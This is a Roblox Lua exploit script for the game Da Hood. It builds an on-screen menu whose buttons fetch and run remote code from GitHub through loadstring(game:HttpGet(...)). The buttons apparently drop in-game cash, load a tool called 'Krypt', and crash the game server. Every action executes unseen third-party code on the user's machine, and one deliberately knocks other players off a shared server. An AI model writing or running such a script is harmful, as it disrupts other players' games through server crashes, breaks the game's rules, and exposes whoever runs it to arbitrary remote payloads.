-- Made by Zay
local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local Drop100kDHC = Instance.new("TextButton")
local ZaysDHCSellingScript = Instance.new("TextLabel")
local Drop1mDHC = Instance.new("TextButton")
local Krypt = Instance.new("TextButton")
local CrashServer = Instance.new("TextButton")
local close = Instance.new("TextButton")
local openmain = Instance.new("Frame")
local open = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(84, 84, 84)
main.BorderColor3 = Color3.fromRGB(84, 84, 84)
main.Position = UDim2.new(0.125567332, 0, 0.503144622, 0)
main.Size = UDim2.new(0, 523, 0, 282)
main.Visible = false
main.Active = true
main.Deaggable = true

Drop100kDHC.Name = "Drop 100k DHC"
Drop100kDHC.Parent = main
Drop100kDHC.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
Drop100kDHC.BorderColor3 = Color3.fromRGB(84, 84, 84)
Drop100kDHC.Position = UDim2.new(0.58317399, 0, 0.581560314, 0)
Drop100kDHC.Size = UDim2.new(0, 200, 0, 50)
Drop100kDHC.Font = Enum.Font.ArialBold
Drop100kDHC.Text = "Drop 100k DHC"
Drop100kDHC.TextColor3 = Color3.fromRGB(255, 255, 255)
Drop100kDHC.TextSize = 26.000
Drop100kDHC.MouseButton1Down:connect(function()
	--// 6Ex's Free Da Hood Cash Selling tool

	--// Factors
	_G.Amount = 100000 --// Full amount you wanna drop like 100,000 (TOTAL AMOUNT YOU WANT TO DROP)
	_G.Tax = true --// If you want to cover the tax (30% fee), make this true, else make it false
	--// Checks
	repeat
		wait()
	until game:IsLoaded()
	--// Handling
	loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/cashseller/main/master",true))()
end)
ZaysDHCSellingScript.Name = "Zay's DHC Selling Script"
ZaysDHCSellingScript.Parent = main
ZaysDHCSellingScript.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
ZaysDHCSellingScript.BorderColor3 = Color3.fromRGB(84, 84, 84)
ZaysDHCSellingScript.Size = UDim2.new(0, 523, 0, 40)
ZaysDHCSellingScript.Font = Enum.Font.GothamBold
ZaysDHCSellingScript.Text = "Zay's DHC Selling Script"
ZaysDHCSellingScript.TextColor3 = Color3.fromRGB(255, 255, 255)
ZaysDHCSellingScript.TextSize = 30.000

Drop1mDHC.Name = "Drop 1m DHC"
Drop1mDHC.Parent = main
Drop1mDHC.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
Drop1mDHC.BorderColor3 = Color3.fromRGB(84, 84, 84)
Drop1mDHC.Position = UDim2.new(0.58317399, 0, 0.290780157, 0)
Drop1mDHC.Size = UDim2.new(0, 200, 0, 50)
Drop1mDHC.Font = Enum.Font.ArialBold
Drop1mDHC.Text = "Drop 1m DHC"
Drop1mDHC.TextColor3 = Color3.fromRGB(255, 255, 255)
Drop1mDHC.TextSize = 30.000
Drop1mDHC.MouseButton1Down:connect(function()
	--// 6Ex's Free Da Hood Cash Selling tool

	--// Factors
	_G.Amount = 1000000 --// Full amount you wanna drop like 100,000 (TOTAL AMOUNT YOU WANT TO DROP)
	_G.Tax = true --// If you want to cover the tax (30% fee), make this true, else make it false
	--// Checks
	repeat
		wait()
	until game:IsLoaded()
	--// Handling
	loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/cashseller/main/master",true))()
end)
Krypt.Name = "Krypt"
Krypt.Parent = main
Krypt.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
Krypt.BorderColor3 = Color3.fromRGB(84, 84, 84)
Krypt.Position = UDim2.new(0.0325047784, 0, 0.581560254, 0)
Krypt.Size = UDim2.new(0, 200, 0, 50)
Krypt.Font = Enum.Font.ArialBold
Krypt.Text = "Krypt"
Krypt.TextColor3 = Color3.fromRGB(255, 255, 255)
Krypt.TextSize = 30.000
Krypt.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/krypt/main/kryptx"))()
end)
CrashServer.Name = "Crash Server"
CrashServer.Parent = main
CrashServer.BackgroundColor3 = Color3.fromRGB(65, 65, 65)
CrashServer.BorderColor3 = Color3.fromRGB(84, 84, 84)
CrashServer.Position = UDim2.new(0.0325047784, 0, 0.290780157, 0)
CrashServer.Size = UDim2.new(0, 200, 0, 50)
CrashServer.Font = Enum.Font.ArialBold
CrashServer.Text = "Crash Server"
CrashServer.TextColor3 = Color3.fromRGB(255, 255, 255)
CrashServer.TextSize = 30.000
CrashServer.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher",true))()
end)
close.Name = "close"
close.Parent = main
close.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
close.BorderColor3 = Color3.fromRGB(59, 59, 59)
close.Position = UDim2.new(0.942638636, 0, 0, 0)
close.Size = UDim2.new(0, 30, 0, 29)
close.Font = Enum.Font.SourceSans
close.Text = "_"
close.TextColor3 = Color3.fromRGB(0, 0, 0)
close.TextSize = 14.000
close.MouseButton1Down:connect(function()
	main.Visible = false
	openmain.Visible = true
end)
openmain.Name = "openmain"
openmain.Parent = ScreenGui
openmain.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
openmain.BorderColor3 = Color3.fromRGB(59, 59, 59)
openmain.Position = UDim2.new(0.125567317, 0, 0.432704419, 0)
openmain.Size = UDim2.new(0, 523, 0, 33)
openmain.Active = true
openmain.Draggable = true

open.Name = "open"
open.Parent = openmain
open.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
open.BorderColor3 = Color3.fromRGB(59, 59, 59)
open.Position = UDim2.new(0.942638636, 0, 0, 0)
open.Size = UDim2.new(0, 30, 0, 33)
open.Font = Enum.Font.SourceSans
open.Text = "_"
open.TextColor3 = Color3.fromRGB(0, 0, 0)
open.TextSize = 14.000
open.MouseButton1Down:connect(function()
	openmain.Visible = false
	main.Visible = true
end)
